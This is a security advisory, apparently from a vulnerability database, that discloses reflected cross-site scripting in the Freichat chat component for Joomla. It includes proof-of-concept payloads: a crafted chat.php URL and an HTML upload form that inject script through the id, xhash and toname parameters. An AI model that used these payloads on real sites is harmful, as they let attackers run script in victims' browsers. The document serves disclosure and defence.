Joomla Freichat Cross Site Scripting

2014.03.16
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Hello, Multiple cross-site scripting (XSS) vulnerabilities in Freichat component for Joomla! allow remote attackers to inject arbitrary web script or HTML code via (1) the id or xhash parameters to /client/chat.php or (2) the toname parameter to /client/plugins/upload/upload.php. File: /client/chat.php Line: 53 POC: http://site/client/chat.php?id=1" ></script><script>alert('XSS 1')</script>&xhash=1" <script>alert('XSS 2')</script> File: /client/plugins/upload/upload.php Line: 91 POC: </style> <body> <div class="frei_upload_border"> <form name="upload" action="http://site/client/plugins/upload/upload.php" method="post" enctype="multipart/form-data"> <label for="file">choose file to send</label><br/><br/> <input id ="fromid" type="hidden" name="fromid"/> <input id="fromname" type="hidden" name="fromname"/> <input id="toid" type="hidden" name="toid"/> <!-- <input id="toname" type="hidden" name="toname"/> --> <input id="toname" type="hidden" name="toname" value="<script>alert('XSS')</script>"/> <input type="file" name="file" id="file" value="a.jpeg" /> <br /><br/> <input class ="frei_upload_button" type="submit" name="submit" value="Send" /> </form> </div> </body></html> Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers. Best Regards.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top